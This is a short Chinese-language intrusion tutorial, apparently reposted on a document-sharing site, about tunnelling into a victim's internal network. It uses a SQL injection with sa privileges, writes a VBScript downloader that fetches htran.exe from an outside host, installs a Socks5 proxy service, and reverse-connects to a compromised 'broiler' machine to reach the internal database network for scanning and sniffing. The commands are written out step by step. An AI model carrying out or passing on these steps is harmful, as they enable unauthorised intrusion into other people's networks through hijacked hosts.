《2022年妙用代理渗透内网.docx》由会员分享,可在线阅读,更多相关《2022年妙用代理渗透内网.docx(3页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、2022年妙用代理渗透内网一、踩点主机: OS:Windows 2000 + IIS 5.0 + MSSQL端口:80 21数据库放内网,IP为 192.168.1.2 ,更重要的是内网数据库可以上网.首页存在注入漏洞,sa登陆.注入点:二、入侵思路1.给内网目标机装个代理服务器2.把弄好的那个代理端口映到公网.3.本机用sockscap连接公网映的那个端口,这样,自己也就进到了内网。4.接下来就是找共享,嗅探,社会工程学等等了。三、入侵打算1.公网肉鸡一只:218.3.1.12.工具:htran2.4,SocksCap,扫描器一份,NBSI 2.0一份。3.A表示数据库主机,B表示公网肉鸡
2、C表示网站放Web的地方 D表示本机(也在内网)4.A:192.168.1.2B:218.3.1.1 C: D:192.168.0.25四、入侵进行时1.工具上传:在nbsi下执行:echo Set x= CreateObject(Microsoft.XMLHTTP):x.Open GET,LCase(WScript.Arguments(0),0:x.Send():Set s = CreateObject(ADODB.Stream):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript
3、.Arguments(1),2 >down.vbs然后下载工具:cscript down.vbs http:/IP/htran.exe htran.exe /到我的空间下载htran.exe2.安装Socks5服务在nbsi下执行:htran.exe -install/安装Socks5服务htran.exe -start/启动Socks5服务3.反弹进行时在B上运行:htran.exe -s -listen 520 5200/监听端口在nbsi下执行:htran.exe -s -connect 218.3.1.1 5203.进入内网现在用SocksCap连接 218.3.1.1 的5200端口,就等于进入了他的内网。五、渗透内网接下来就可以扫描,嗅探,等等,也就是后话了。六、总结文章技术性不高,有错的地方希望高手指出,偶是菜鸟,也希望这篇文章对大家有所帮助。